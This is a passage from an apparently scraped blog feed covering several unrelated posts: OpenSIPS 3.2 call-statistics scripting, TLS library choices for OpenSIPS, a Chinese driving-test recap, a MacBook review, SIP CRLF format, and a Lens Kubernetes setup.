Thus, 5xx, 6xx reply codes and internal 408 timeouts generated before reaching the client do not count here. The following is always true: CCR \u0026gt;= ASR PDD (Post Dial Delay) – the duration, in milliseconds, between the receipt of the initial INVITE and the receipt of the first 180/183 provisional reply (the call state advances to “ringing”) AST (Average Setup Time) – the duration, in milliseconds, between the receipt of the initial INVITE and the receipt of the first 200 OK reply (the call state advances to “answered”). The following is always true: AST \u0026gt;= PDD ACD (Average Call Duration) – the duration, in seconds, between the receipt of the initial INVITE and the receipt of the first BYE request from either participant (the call state advances to “ended”) NER (Network Effectiveness Ratio) – measures the ability of a server to deliver the call to the called terminal; in addition to ASR, NER also considers busy and user failures as success Now that we know what we want to see, we can start scripting: we need to load the statistics module, and define two types of profiles: one that computes average indices (used for AST, PDD, ACD), and one for percentage indices (used for ASR, NER, CCR). 
For each of them, we define 3 different time windows: per minute, per 10 minutes and per hour:\nloadmodule \u0026#34;statistics.so\u0026#34; modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;perc: algorithm=percentage group=stats\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;10m-perc: algorithm=percentage window=600 slots=10 group=stats_10m\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;1h-perc: algorithm=percentage window=3600 slots=6 group=stats_1h\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;avg: algorithm=average group=stats\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;10m-avg: algorithm=average window=600 slots=10 group=stats_10m\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;1h-avg: algorithm=average window=3600 slots=6 group=stats_1h\u0026#34;) In order to catch all the relevant events we need to hook on, we will be using the E_ACC_CDR and E_ACC_MISSED_EVENT events exposed by the accounting module. In order to identify the customer that the events were triggered for, we need to export the customer\u0026#39;s identifier in the event:\nloadmodule \u0026#34;acc.so\u0026#34; modparam(\u0026#34;acc\u0026#34;, \u0026#34;extra_fields\u0026#34;,\u0026#34;evi: customer\u0026#34;) route { ... if (!has_totag() \u0026amp;\u0026amp; is_method(\u0026#34;INVITE\u0026#34;)) { do_accounting(\u0026#34;evi\u0026#34;, \u0026#34;cdr|missed\u0026#34;); t_on_reply(\u0026#34;stats\u0026#34;); # store the moment the call started get_accurate_time($avp(call_start_s), $avp(call_start_us)); # TODO: store the customer\u0026#39;s id in $acc_extra(customer) } ... 
} When a reply comes in, our “stats” reply route will be called, where we will update all the statistics, according to our logic. Because we need to compute them twice, once for global statistics, and once for the customer's, we will put the logic in a new route, “calculate_stats_reply”, that we call when a reply comes in:\nonreply_route[stats] { route(calculate_stats_reply, $avp(call_start_s), $avp(call_start_us), \u0026#34;\u0026#34;); route(calculate_stats_reply, $avp(call_start_s), $avp(call_start_us), $acc_extra(customer)); } route[calculate_stats_reply] { # expects: # - param 1: timestamp (in seconds) when the initial request was received # - param 2: timestamp (in microseconds) when the initial request was received # - param 3: statistic identifier; for global, empty string is used if ($rs == \u0026#34;180\u0026#34; || $rs == \u0026#34;183\u0026#34; || $rs == \u0026#34;200\u0026#34; || $rs == \u0026#34;400\u0026#34; || $rs == \u0026#34;403\u0026#34; || $rs == \u0026#34;408\u0026#34; || $rs == \u0026#34;480\u0026#34; || $rs == \u0026#34;487\u0026#34;) { if (!isflagset(\u0026#34;FLAG_PDD_CALCULATED\u0026#34;)) { get_accurate_time($var(now_s), $var(now_us)); ts_usec_delta($var(now_s), $var(now_us), $param(1), $param(2), $var(pdd_us)); $var(pdd_ms) = $var(pdd_us) / 1000; # milliseconds $avp(pdd) = $var(pdd_ms); setflag(\u0026#34;FLAG_PDD_CALCULATED\u0026#34;); } else { $var(pdd_ms) = $avp(pdd); } update_stat_series(\u0026#34;avg\u0026#34;, \u0026#34;PDD$param(3)\u0026#34;, $var(pdd_ms)); update_stat_series(\u0026#34;10m-avg\u0026#34;, \u0026#34;PDD_10m$param(3)\u0026#34;, $var(pdd_ms)); update_stat_series(\u0026#34;1h-avg\u0026#34;, \u0026#34;PDD_1h$param(3)\u0026#34;, $var(pdd_ms)); } if ($rs \u0026gt;= 200 \u0026amp;\u0026amp; $rs \u0026lt; 300) { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;ASR$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;ASR_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, 
\u0026#34;ASR_1h$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;NER$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;NER_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;NER_1h$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;CCR$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;CCR_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;CCR_1h$param(3)\u0026#34;, 1); get_accurate_time($var(now_s), $var(now_us)); ts_usec_delta($var(now_s), $var(now_us), $param(1), $param(2), $var(ast_us)); $var(ast_us) = $var(ast_us) / 1000; # milliseconds update_stat_series(\u0026#34;avg\u0026#34;, \u0026#34;AST$param(3)\u0026#34;, $var(ast_us)); update_stat_series(\u0026#34;10m-avg\u0026#34;, \u0026#34;AST_10m$param(3)\u0026#34;, $var(ast_us)); update_stat_series(\u0026#34;1h-avg\u0026#34;, \u0026#34;AST_1h$param(3)\u0026#34;, $var(ast_us)); } } In case of a successful call, the dialog generates a CDR, that we use to update our ACD statistics:\nevent_route[E_ACC_CDR] { route(calculate_stats_cdr, $param(duration), $param(setuptime), \u0026#34;\u0026#34;); route(calculate_stats_cdr, $param(duration), $param(setuptime), $param(customer)); } route[calculate_stats_cdr] { # expects: # - param 1: duration (in seconds) of the call # - param 2: setuptime (in seconds) of the call # - param 3: optional - statistic identifier; global is empty string $var(total_duration) = $param(1) + $param(2); update_stat_series(\u0026#34;avg\u0026#34;, \u0026#34;ACD$param(3)\u0026#34;, $var(total_duration)); update_stat_series(\u0026#34;10m-avg\u0026#34;, \u0026#34;ACD_10m$param(3)\u0026#34;, $var(total_duration)); update_stat_series(\u0026#34;1h-avg\u0026#34;, \u0026#34;ACD_1h$param(3)\u0026#34;, $var(total_duration)); } And in case of a failure, we update the corresponding 
statistics:\nevent_route[E_ACC_MISSED_EVENT] { route(calculate_stats_failure, $param(code), \u0026#34;\u0026#34;); route(calculate_stats_failure, $param(code), $param(customer)); } route[calculate_stats_failure] { # expects: # - param 1: failure code # - param 2: statistic identifier; global is empty string update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;ASR$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;ASR_10m$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;ASR_1h$param(3)\u0026#34;, -1); if ($param(1) == \u0026#34;486\u0026#34; || $param(1) == \u0026#34;408\u0026#34;) { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;NER$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;NER_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;NER_1h$param(3)\u0026#34;, 1); } else { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;NER$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;NER_10m$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;NER_1h$param(3)\u0026#34;, -1); } if ($(param(1){s.int}) \u0026gt; 499) { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;CCR$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;CCR_10m$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;CCR_1h$param(3)\u0026#34;, -1); } else { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;CCR$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;CCR_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;CCR_1h$param(3)\u0026#34;, 1); } } And we are all set – all you have to do is to run traffic through your server, query the statistics (over MI) at your desired pace (such as every minute), and plot them nicely in a graph to improve your monitoring 
experience.\nPossible enhancements There is currently no way of persisting these statistics over a restart – this means that every time you restart, the new statistics have to be re-computed, resulting in possibly misleading results. In the future, it would be nice if we could provide some sort of persistent storage for them.All statistics are currently local, although it might be possible to aggregate values across multiple servers using some scripting + cluster broadcast messages from script. Ideally, we shall implement this in an automatic fashion using the clusterer module.Finally, although there are currently only three algorithms supported (accumulate, percentage and average), more can be added quite easily – we shall do that in future versions.Enjoy your new statistics!\n","permalink":"https://wdd.js.org/opensips/blog/call-stat/","summary":"早期1x和2x版本的OpenSIPS,统计模块只有两种模式,一种是计算值,另一种是从运行开始的累加值。而无法获取比如说最近一分钟,最近5分钟,这样的基于一定周期的统计值,在OpenSIPS 3.2上,提供了新的解决方案。\n原文:https://blog.opensips.org/2021/02/02/improved-series-based-call-statistics-using-opensips-3-2/\nReal-time call statistics is an excellent tool to evaluate the quality and performance of your telephony platform, that is why it is very important to expose as many statistics as possible, accumulated over different periods of time.OpenSIPS provides an easy to use interface that exposes simple primitives for creating, updating, and displaying various statistics, both well defined as well as tailored to your needs. 
However, the current implementation comes with a limitation: statistics are gathered starting from the beginning of the execution, up to the point they are read.","title":"Improved series-based call statistics using OpenSIPS 3.2"},{"content":" OpenSIPS和OpenSSL之间的集成总是存在各种各样的问题。我之前就遇到死锁的问题,OpenSIPS的CPU占用很高。但是不再处理SIP消息。最终排查下来,是和OpenSSL有关。 深层次的原因,是因为OpenSIPS是个多进程的程序,而OpenSSL主要是面向多线程的程序。 在OpenSIPS3.2版本上,官方团队列出了几个OpenSSL的替代品,并进行优劣对比,最终选择一个比较好的方案。 我们一起来看看吧。\nFor the purpose of providing secure SIP communication over the TLS protocol, OpenSIPS uses the OpenSSL library, the most popular TLS implementation across the Internet. However, integrating OpenSSL with OpenSIPS has posed a series of challenges starting with OpenSSL version 1.1.0, and has caused quite a few bugs and crashes since then, as presented in more detail in this article.As such, for the new OpenSIPS 3.2 version, we have finally decided to provide support for an additional TLS library, as an alternative to OpenSSL. In this article, we are going to take a look at the options we have explored and the criteria and factors that we used to choose a candidate.\nIssues with OpenSSL Even though up to this point, we have been able to solve the encountered issues, new problems continue to emerge and there are still ongoing reports and Github tickets on this topic. The main reason for this, in short, is that OpenSSL is designed with multi-threaded applications in mind, and is incompatible with certain design principles of a multi-process application like OpenSIPS. 
OpenSSL is not intended to be used in an environment where TLS connections can be shared between multiple worker processes.\nRequirements for a new TLS library First, we considered the following general requirements for the new TLS library to use in OpenSIPS:\ncross-platform support, availability for many operating systems (ideally, through the default package repository); comprehensive, up to date documentation; support for the latest and widely used protocols and encryption algorithms; mature, lively project and good adoption. But more precisely, in order for a TLS library to be viable for OpenSIPS, in the light of our multi-process architecture constraints, we specifically look for:\nthread-safe design (in OpenSIPS we only have a single thread per process, but we do concurrently access the library from multiple processes nonetheless); hooks for providing custom memory allocation functions (instead of the system malloc() family), to make sure the TLS connection contexts are allocated in OpenSIPS shared memory, similarly to CRYPTO_set_mem_functions() in OpenSSL; hooks for providing custom locking mechanisms (primitives like create, lock, unlock mutex) in order to synchronize access between processes to the shared TLS connection contexts, similarly to the obsolete CRYPTO_set_locking_callback() in OpenSSL; no use of specific, per-thread memory zone storage mechanisms like Thread Local Storage (which OpenSSL adopted in version 1.1.1, and caused further crashes in OpenSIPS). 
Candidates In this section we are going to list the top candidates that we have identified in our search for the best TLS implementation that fits OpenSIPS and provide a short conclusion on the findings on each one.\nOpenSSL forks Even though prominent OpenSSL forks like LibreSSL (forked by OpenBSD project from OpenSSL 1.0.1g) or BoringSSL (forked by Google) seem good options from other perspectives (like features or availability), they fail to bring or keep from old OpenSSL the required mechanisms for properly integrating with OpenSIPS. LibreSSL for example has dropped both CRYPTO_set_mem_functions() and CRYPTO_set_locking_callback().\nGnuTLS Popular among free and open source software, GnuTLS’s documentation on thread safety does not seem to indicate that it is safe to share TLS session objects between threads. Moreover, the library uses hard-coded mutex implementations (e.g., pthreads on GNU/Linux and CriticalSection on Windows) for several aspects, like random number generation (this operation has led to issues in OpenSSL). In terms of custom application hooks, GnuTLS does offer gnutls_global_set_mutex() for locking, but since version 3.3.0 has dropped gnutls_global_set_mem_functions() for memory allocation, which is a must for OpenSIPS shared memory.\nMbed TLS Formerly known as PolarSSL, MbedTLS is a library designed for embedded devices and for the purpose of better integration with different systems, offers abstraction layers for memory allocation and threading mechanisms. OpenSIPS can take advantage of these features by installing its own handlers via mbedtls_platform_set_calloc_free() and mbedtls_threading_set_alt(). The downside in this case is that the customisations are only available if the library is compiled with specific flags, which are not enabled by default. 
This would mean that TLS in OpenSIPS would not properly work with the library installed directly from packages, which is not a desirable approach.\nWolfSSL Previously called yaSSL / CyaSSL, WolfSSL is a lightweight TLS library aimed at embedded devices. It has achieved high distribution volumes on all systems nevertheless, due to formerly being bundled with MySQL, as the default TLS implementation. As is the case with Mbed TLS, the library’s high portability design can be exploited for better integration with OpenSIPS. WolfSSL provides a hook for setting custom memory allocation functions through wolfSSL_SetAllocators() but does not offer a way to change the locking mechanism at runtime (unless compiled differently). However, the documentation and forum discussions on this matter, suggest that as long as access to shared connection contexts is synchronised at the user application level, the library will not internally acquire any mutexes and no concurrency issues will arise.\nFinal choice Based on our evaluation of the available TLS libraries, WolfSSL seems to be a good TLS implementation overall and the most appropriate to work with OpenSIPS’s multi-process design and constraints. In conclusion, starting with OpenSIPS 3.2, we plan on providing the possibility of choosing between WolfSSL and OpenSSL for the TLS needs in OpenSIPS.\n参考:https://blog.opensips.org/2021/02/11/exploring-ssl-tls-libraries-for-opensips-3-2/\n","permalink":"https://wdd.js.org/opensips/blog/opensips3-tls/","summary":"OpenSIPS和OpenSSL之间的集成总是存在各种各样的问题。我之前就遇到死锁的问题,OpenSIPS的CPU占用很高。但是不再处理SIP消息。最终排查下来,是和OpenSSL有关。 深层次的原因,是因为OpenSIPS是个多进程的程序,而OpenSSL主要是面向多线程的程序。 在OpenSIPS3.2版本上,官方团队列出了几个OpenSSL的替代品,并进行优劣对比,最终选择一个比较好的方案。 我们一起来看看吧。\nFor the purpose of providing secure SIP communication over the TLS protocol, OpenSIPS uses the OpenSSL library, the most popular TLS implementation across the Internet. 
However, integrating OpenSSL with OpenSIPS has posed a series of challenges starting with OpenSSL version 1.1.0, and has caused quite a few bugs and crashes since then, as presented in more detail in this article.As such, for the new OpenSIPS 3.","title":"Exploring SSL/TLS libraries for OpenSIPS 3.2"},{"content":"科目二倒库和四项练的差不多了,决定去参加考试,考试虽然一波三折,但结果还是好的,一次通过了\n考场熟悉 考场倒库有14个区,没什么好讲的。 四项有4个环线,每个环线上有两个考试线路,所以一共是8条线路 务必看懂各种符号的含义,例如曲线,侧方, 直角与坡道 【重点】当你知道你自己在那条线上考试之后,务必对照着线路图,将四项的顺序以及位置牢记于心。虽然路上会有牌子指示下一项内容是什么,但是考试的时候,由于视线等各种原因可能不会去在意。也有人,看到前面是直角,就以为是前面是直角转弯,结果到了真正直角转弯的位置,却没有做直角相关的操作,导致考试失败。 例如,当你被选择到8号线的四项时,你到了7-8待考等待区后,等待自己的考试车。在等待过程中按照平面图,可以发现,离待考最近的起点之后,8号线,第一个考试项目侧方停车,然后是直角转弯,接着是S弯,最后是坡道。\n模拟考相关 模拟的费用以及项目内容 模拟的费用是360,包含以下内容\n倒车入库120,可以倒库3次 四项有八条线路,每个线路各跑一次 四项的车和倒库的车是不同的,这点需要注意。\n模拟考有用吗? 我觉得是有用的\n一般驾校只有一两条线路,实际考场有8条线路。每条线路你都可以跑一次,从1号线到8号线。跑过这8条线,你会基本知道自己四项中哪些项目比较容易出错。可以针对性加强。另外也可以找找坡道的点位。 跑模拟四项的时候,有个教练会坐在副驾驶上。他会不断的催促你,此时你千万不要让他的催促导致你连续的出错,进而影响到你考试的心态。你是交了钱的,离合和油门都在你这边,教练再催,也是没办法让车加速的。你不要怂。【注意:在真实考试时,副驾驶是没有人的。】 教练为什么要不停的催你,因为你越快跑完8条线路,他就可以接更多的学员,他手里的小票就越多,提成就越多。当你模拟完8条线路,教练会让你再买几条线路。线路其实是可以按条买的,每条线跑一次30块。真是车轮一转,家财万贯。车轮一响,黄金万两啊。 虽然倒库的车库有14个,但是你模拟的那个车库,其实有极大的可能就是你真实考试的那个车库。这样你就可以提前熟悉一下车库的点位。我比较菜,模拟三次的倒库都倒失败了。但是我从三次失败中也学到了自己失败的原因。从而在真实考试时成功通过。倒库如果你三次都失败了,也可以单独买的。倒3次60块。倒6次120块。但是这就不建议再花钱了。你应该记住自己的错误的点。比如是那边压线了,然后回到驾校,和你的教练沟通一下。驾校的教练会给你更加有用的建议。另外你务必要记住自己是几号库,你只要和驾校教练沟通一下,他都知道这个库位的处理细节的。 如果我没有模拟考过,很可能我科目二第一次会挂,然后还要花时间去搞这件事。如果能用钱解决的事情,我更希望能节省一些时间。 心态 考试的心态很重要,和我一起参加考试的一个同学。他没有参加模拟考,但是他在考试中倒库一把就倒进去了。我认为他是比较牛逼的。但是有可能他骄傲了,挂在了几个转向灯和坡道定点上。侧方停车时,出库居然忘记打转向灯了。\n也有人忘记系安全带了。\n很多小的点,也很容易的点。在驾校都练的很熟练,但是一到考场,就总是丢三落四的忘记。为什么会有这种场景的。\n因为心态变了。\n","permalink":"https://wdd.js.org/posts/2021/01/","summary":"科目二倒库和四项练的差不多了,决定去参加考试,考试虽然一波三折,但结果还是好的,一次通过了\n考场熟悉 考场倒库有14个区,没什么好讲的。 四项有4个环线,每个环线上有两个考试线路,所以一共是8条线路 务必看懂各种符号的含义,例如曲线,侧方, 直角与坡道 【重点】当你知道你自己在那条线上考试之后,务必对照着线路图,将四项的顺序以及位置牢记于心。虽然路上会有牌子指示下一项内容是什么,但是考试的时候,由于视线等各种原因可能不会去在意。也有人,看到前面是直角,就以为是前面是直角转弯,结果到了真正直角转弯的位置,却没有做直角相关的操作,导致考试失败。 
例如,当你被选择到8号线的四项时,你到了7-8待考等待区后,等待自己的考试车。在等待过程中按照平面图,可以发现,离待考最近的起点之后,8号线,第一个考试项目是侧方停车,然后是直角转弯,接着是S弯,最后是坡道。\n模拟考相关 模拟的费用以及项目内容 模拟的费用是360,包含以下内容\n倒车入库120,可以倒库3次 四项有八条线路,每个线路各跑一次 四项的车和倒库的车是不同的,这点需要注意。\n模拟考有用吗? 我觉得是有用的\n一般驾校只有一两条线路,实际考场有8条线路。每条线路你都可以跑一次,从1号线到8号线。跑过这8条线,你会基本知道自己四项中哪些项目比较容易出错。可以针对性加强。另外也可以找找坡道的点位。 跑模拟四项的时候,有个教练会坐在副驾驶上。他会不断地催促你,此时你千万不要让他的催促导致你连续的出错,进而影响到你考试的心态。你是交了钱的,离合和油门都在你这边,教练再催,也是没办法让车加速的。你不要怂。【注意:在真实考试时,副驾驶是没有人的。】 教练为什么要不停地催你,因为你越快跑完8条线路,他就可以接更多的学员,他手里的小票就越多,提成就越多。当你模拟完8条线路,教练会让你再买几条线路。线路其实是可以按条买的,每条线跑一次30块。真是车轮一转,家财万贯。车轮一响,黄金万两啊。 虽然倒库的车库有14个,但是你模拟的那个车库,其实有极大的可能就是你真实考试的那个车库。这样你就可以提前熟悉一下车库的点位。我比较菜,模拟三次的倒库都倒失败了。但是我从三次失败中也学到了自己失败的原因,从而在真实考试时成功通过。倒库如果你三次都失败了,也可以单独买的。倒3次60块,倒6次120块。但是这就不建议再花钱了。你应该记住自己出错的点,比如是哪边压线了,然后回到驾校,和你的教练沟通一下。驾校的教练会给你更加有用的建议。另外你务必要记住自己是几号库,你只要和驾校教练沟通一下,他都知道这个库位的处理细节的。 如果我没有模拟考过,很可能我科目二第一次会挂,然后还要花时间去搞这件事。如果能用钱解决的事情,我更希望能节省一些时间。 心态 考试的心态很重要。和我一起参加考试的一个同学,他没有参加模拟考,但是他在考试中倒库一把就倒进去了。我认为他是比较牛逼的。但是有可能他骄傲了,挂在了几个转向灯和坡道定点上。侧方停车时,出库居然忘记打转向灯了。\n也有人忘记系安全带了。\n很多小的点,也很容易的点,在驾校都练得很熟练,但是一到考场,就总是丢三落四地忘记。为什么会有这种情况呢?\n因为心态变了。\",\"permalink\":\"https://wdd.js.org/posts/2021/01/\",\"summary\":\"科目二倒库和四项练得差不多了,决定去参加考试,考试虽然一波三折,但结果还是好的,一次通过了\n考场熟悉 考场倒库有14个区,没什么好讲的。 四项有4个环线,每个环线上有两个考试线路,所以一共是8条线路 务必看懂各种符号的含义,例如曲线,侧方, 直角与坡道 【重点】当你知道自己在哪条线上考试之后,务必对照着线路图,将四项的顺序以及位置牢记于心。虽然路上会有牌子指示下一项内容是什么,但是考试的时候,由于视线等各种原因可能不会去在意。也有人,看到前面是直角,就以为前面就是直角转弯,结果到了真正直角转弯的位置,却没有做直角相关的操作,导致考试失败。 例如,当你被选择到8号线的四项时,你到了7-8待考等待区后,等待自己的考试车。在等待过程中按照平面图,可以发现,离待考最近的起点之后,8号线,第一个考试项目是侧方停车,然后是直角转弯,接着是S弯,最后是坡道。\n模拟考相关 模拟的费用以及项目内容 模拟的费用是360,包含以下内容\n倒车入库120,可以倒库3次 四项有八条线路,每个线路各跑一次 四项的车和倒库的车是不同的,这点需要注意。\n模拟考有用吗? 我觉得是有用的\n一般驾校只有一两条线路,实际考场有8条线路。每条线路你都可以跑一次,从1号线到8号线。跑过这8条线,你会基本知道自己四项中哪些项目比较容易出错。可以针对性加强。另外也可以找找坡道的点位。 跑模拟四项的时候,有个教练会坐在副驾驶上。他会不断地催促你,此时你千万不要让他的催促导致你连续的出错,进而影响到你考试的心态。你是交了钱的,离合和油门都在你这边,教练再催,也是没办法让车加速的。你不要怂。【注意:在真实考试时,副驾驶是没有人的。】 教练为什么要不停地催你,因为你越快跑完8条线路,他就可以接更多的学员,他手里的小票就越多,提成就越多。当你模拟完8条线路,教练会让你再买几条线路。线路其实是可以按条买的,每条线跑一次30块。真是车轮一转,家财万贯。车轮一响,黄金万两啊。 虽然倒库的车库有14个,但是你模拟的那个车库,其实有极大的可能就是你真实考试的那个车库。这样你就可以提前熟悉一下车库的点位。我比较菜,模拟三次的倒库都倒失败了。但是我从三次失败中也学到了自己失败的原因,从而在真实考试时成功通过。倒库如果你三次都失败了,也可以单独买的。倒3次60块,倒6次120块。但是这就不建议再花钱了。你应该记住自己出错的点,比如是哪边压线了,然后回到驾校,和你的教练沟通一下。驾校的教练会给你更加有用的建议。另外你务必要记住自己是几号库,你只要和驾校教练沟通一下,他都知道这个库位的处理细节的。 如果我没有模拟考过,很可能我科目二第一次会挂,然后还要花时间去搞这件事。如果能用钱解决的事情,我更希望能节省一些时间。 心态 考试的心态很重要。和我一起参加考试的一个同学,他没有参加模拟考,但是他在考试中倒库一把就倒进去了。我认为他是比较牛逼的。但是有可能他骄傲了,挂在了几个转向灯和坡道定点上。侧方停车时,出库居然忘记打转向灯了。\n也有人忘记系安全带了。\n很多小的点,也很容易的点,在驾校都练得很熟练,但是一到考场,就总是丢三落四地忘记。为什么会有这种情况呢?\n因为心态变了。","title":"南京尧新科目二考试回顾"},{"content":"我的macbook是2017买的, 使用到今天大概1204天。\n最初的使用体验是\n触摸板很灵敏 屏幕很高清 系统很流畅 三年中出现过的问题\n键盘中的几个按键出现过问题,按键不灵敏。17年是用的蝴蝶键盘,这个键盘问题很多。最新版已经换成了剪刀脚键盘了。 屏幕老化,屏幕的四周出现淡红色的红晕,但是不影响使用。 如果不充电的情况下,掉电蛮快的,而且有时候电量还很多,就自动关机。 现在的感觉:\n触摸板我基本不会用了,因为大部分时间我用键盘就可以搞定一切。因为我用了vim编辑器。 我也不再使用macbook pro自带的键盘,因为真是不好用。所有的笔记本键盘,除了thinkpad的键盘,都不太好用,不适合长时间打字。所以我用了外接的静电容键盘。 无论多么好的自带键盘,都比不过外接的键盘,毕竟是专业的。当然,除非你经常出差或者移动,否则外接键盘真是非常值得入手。 关于下一台电脑:下一台电脑我会等待M2芯片, macbook pro或者是macbook mini, 这个我还没想好。我对命令行以及相关unix有着很大的依赖。即使用ubuntu, 我也不可能再使用windows。\n","permalink":"https://wdd.js.org/posts/2020/12/kxpswu/","summary":"我的macbook是2017买的, 使用到今天大概1204天。\n最初的使用体验是\n触摸板很灵敏 屏幕很高清 系统很流畅 三年中出现过的问题\n键盘中的几个按键出现过问题,按键不灵敏。17年是用的蝴蝶键盘,这个键盘问题很多。最新版已经换成了剪刀脚键盘了。 屏幕老化,屏幕的四周出现淡红色的红晕,但是不影响使用。 如果不充电的情况下,掉电蛮快的,而且有时候电量还很多,就自动关机。 现在的感觉:\n触摸板我基本不会用了,因为大部分时间我用键盘就可以搞定一切。因为我用了vim编辑器。 我也不再使用macbook pro自带的键盘,因为真是不好用。所有的笔记本键盘,除了thinkpad的键盘,都不太好用,不适合长时间打字。所以我用了外接的静电容键盘。 
无论多么好的自带键盘,都比不过外接的键盘,毕竟是专业的。当然,除非你经常出差或者移动,否则外接键盘真是非常值得入手。 关于下一台电脑:下一台电脑我会等待M2芯片, macbook pro或者是macbook mini, 这个我还没想好。我对命令行以及相关unix有着很大的依赖。即使用ubuntu, 我也不可能再使用windows。","title":"macbook pro 使用三年后的感受"},{"content":" generic-message = start-line *message-header CRLF [ message-body ] start-line = Request-Line / Status-Line 其中在rfc2543中规定\nCR = %d13 ; US-ASCII CR, carriage return character LF = %d10 ; US-ASCII LF, line feed character 项目 十进制 字符串表示 CR 13 \\r LF 10 \\n 也就是说在一个SIP消息中\nheadline\\r\\n key:v\\r\\n \\r\\n some_body\\r\\n 所以CRLF就是 \\r\\n 参考 https://tools.ietf.org/html/rfc3261 https://tools.ietf.org/html/rfc2543 ","permalink":"https://wdd.js.org/opensips/ch3/sip-crlf/","summary":" generic-message = start-line *message-header CRLF [ message-body ] start-line = Request-Line / Status-Line 其中在rfc2543中规定\nCR = %d13 ; US-ASCII CR, carriage return character LF = %d10 ; US-ASCII LF, line feed character 项目 十进制 字符串表示 CR 13 \\r LF 10 \\n 也就是说在一个SIP消息中\nheadline\\r\\n key:v\\r\\n \\r\\n some_body\\r\\n 所以CRLF就是 \\r\\n 参考 https://tools.ietf.org/html/rfc3261 https://tools.ietf.org/html/rfc2543 ","title":"SIP消息格式CRLF"},{"content":"下载安装 Lens-4.0.4.dmg\n添加集群 在k8s master 节点上输入下面的指令,将输出内容复制一下\nkubectl config view --minify --raw 选择File \u0026gt; Add cluster 粘贴 集群就显示出来了 ","permalink":"https://wdd.js.org/posts/2020/12/ai1lnu/","summary":"下载安装 Lens-4.0.4.dmg\n添加集群 在k8s master 节点上输入下面的指令,将输出内容复制一下\nkubectl config view --minify --raw 选择File \u0026gt; Add cluster 粘贴 集群就显示出来了 ","title":"lens k8s IDE"},{"content":" In order to provide secure SIP communication over TLS connections, OpenSIPS uses the OpenSSL library, probably the most widely used open-source TLS \u0026amp; SSL library across the Internet. The fact that it is so popular and widely used makes it more robust, therefore a great choice to enforce security in a system! That was the reason it was chosen to be used in OpenSIPS in the first place. 
However, being designed as a multi-threaded library, while OpenSIPS is a multi-process application, integrating it was not an easy task. Furthermore, maintaining it was not trivial either. And the major changes in the OpenSSL library within the last couple of years have proven that. Once the library maintainers decided to have a more robust thread-safe approach, things started to break in OpenSIPS. Hence the numerous issues reported within the last couple of years related to SSL bugs and crashes. The purpose of this post is to present the challenges we faced, and how we dealt with them. This article describes the way OpenSSL, a library designed for multi-threading, was made to work in OpenSIPS, a multi-process application, and the journey of maintaining the code by adapting to the changes in the OpenSSL library throughout the years.\nOpenSSL是个多线程的程序, OpenSIPS是个多进程的程序,两者配合比较难 OpenSSL的大版本升级,有很大的可能性导致OpenSIPS也出问题 在github上有很多的issue都是关于OpenSSL和OpenSIPS [BUG] Deadlock in libssl/libcrypto #1767 https://github.com/OpenSIPS/opensips/issues/1858 Original design The initial design and implementation of TLS support in OpenSIPS was done in 2003. Back then OpenSSL was releasing revision 0.9.6. That’s the version that we have used for the original design and implementation. OpenSIPS is a multi-process server that is able to handle SIP requests or replies in multiple processes, in parallel. When a message is received it is “assigned” to any of its free processes, which is responsible for the entire processing of that message. Any of these processes might decide, based on the routing logic, that the request has to be forwarded to the next hop using TLS. This means that any OpenSIPS process worker needs to be able to forward a message using SSL/TLS connections. 
And naturally, since all these processes run simultaneously, multiple processes can decide to forward the messages to the same TLS destination, raising various consistency concerns. In terms of design, there were three possible ways of ensuring consistency in this multi-process environment:\nEach process has its own SSL/TLS connection towards each destination. This means that if you have N workers and M destinations, your OpenSIPS server will have to maintain NxM connections. That’s something we should avoid. Map each SSL/TLS connection to a worker, and only that worker is allowed to communicate with that endpoint. When a different process has to forward a message to a specific endpoint, it will first send the message/job to the designated worker, which forwards it down to the next hop. Although this looks OK, it involves an extra layer of inter-process communication, for the job dispatching, and it is also prone to scalability issues (for example when the destination is a TLS trunk). Keep a single SSL/TLS connection to each destination throughout all the processes, and make sure there’s mutually exclusive concurrent access to it. This seems to be the most elegant solution, as your SIP 